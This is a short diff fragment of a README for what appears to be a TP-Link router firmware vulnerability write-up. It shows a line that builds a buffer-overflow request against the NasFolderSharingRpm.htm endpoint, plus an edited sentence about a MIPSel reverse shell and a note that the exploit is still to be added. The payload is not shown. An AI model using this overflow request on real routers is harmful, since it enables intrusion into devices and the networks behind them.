hdbreaker/Escalating-TPLinkFirmware-Vulnerabilities/README.md

 bof_url = base_url+"/"+session_id+"/userRpm/NasFolderSharingRpm.htm?displayName=bof&shareEntire="+payload+"&no_use_para_just_fix_ie_sub_bug=&Save=Save&selPage=0&Page=1&subpage=2&no_use_para_just_fix_ie_sub_bug="
 ```

-And the exploit works as can be seen below:
+And obviously the target address and the reverse shell address in the Mipsel Reverse Shell then the exploit worked without  problem as can be seen below:

 **TODO: CREATE AND ADD EXPLOIT and add Images/Videos of exploitation and reaching internal network**